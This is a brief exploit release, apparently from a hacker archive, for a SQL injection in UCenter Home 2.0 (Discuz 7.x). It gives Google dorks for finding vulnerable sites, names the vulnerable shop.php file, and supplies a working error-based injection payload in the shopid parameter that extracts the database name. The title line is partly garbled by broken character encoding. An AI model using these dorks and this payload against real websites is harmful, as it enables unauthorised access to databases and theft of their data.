Discuz7.Xͨɱ0day©(UCenter Home-2.0)

2012716
۷



 
*/ Author : KnocKout
 */ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
 */ Contact: knockoutr@msn.com
 */ Cyber-Warrior.org/CWKnocKout
 Dork : Powered by UCenter inurl:shop.php?ac=view
 Dork 2 : inurl:shop.php?ac=view&amp;shopid=
 Vuln file : Shop.php
 
===================================================================
 POC
 
shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,027,unhex(hex(database())),027,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1